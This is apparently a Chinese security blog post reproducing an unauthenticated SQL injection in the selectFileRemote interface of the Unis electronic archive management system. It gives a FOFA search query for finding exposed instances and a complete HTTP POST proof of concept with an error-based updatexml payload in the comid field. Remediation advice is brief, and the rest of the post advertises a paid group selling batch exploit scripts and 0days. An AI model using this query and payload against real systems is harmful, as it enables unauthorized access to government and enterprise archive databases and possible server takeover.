「漏洞复现」紫光电子档案管理系统 selectFileRemote SQL注入漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

紫光电子档案管理系统是一款由紫光软件系统有限公司自主研发的通用档案管理系统,该系统在档案及电子文件方面的发展已有多年历史,积累了丰富的行业经验和技术实力,系统遵循国家档案管理标准,结合先进的信息化管理理念,旨在为政府机关、企事业单位提供高质量的档案信息化解决方案。该系统采用互联网云计算的技术框架,并通过UE优化设计,符合用户的使用习惯,是一套具有先进性、安全性、前瞻性的综合档案管理平台。

0x03 漏洞威胁

紫光电子档案管理系统 selectFileRemote 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x04 漏洞环境

FOFA:

复制代码
body="www.unissoft.com"

0x05 漏洞复现

PoC

复制代码
POST /Archive/ErecordManage/selectFileRemote HTTP/1.1
Host: 
Accept: */* Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded

userID=admin&fondsid=1&comid=' and updatexml(1,concat(0x7e,MD5(123456),0x7e),1)=1

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25

星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

相关推荐
竹言笙熙5 小时前
Polarctf2025夏季赛 web java ez_check
java·学习·web安全
lubiii_7 小时前
SQL手工测试(MySQL数据库)
数据库·mysql·web安全·网络安全
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
DevSecOps选型指南18 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
恰薯条的屑海鸥18 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
网安INF20 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_21 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
上海云盾第一敬业销售1 天前
高防IP可以防护什么攻击类型?企业网络安全的第一道防线
网络·tcp/ip·web安全
饮长安千年月1 天前
JavaSec-SpringBoot框架
java·spring boot·后端·计算机网络·安全·web安全·网络安全
淡水猫.1 天前
ApacheSuperset CVE-2023-27524
安全·web安全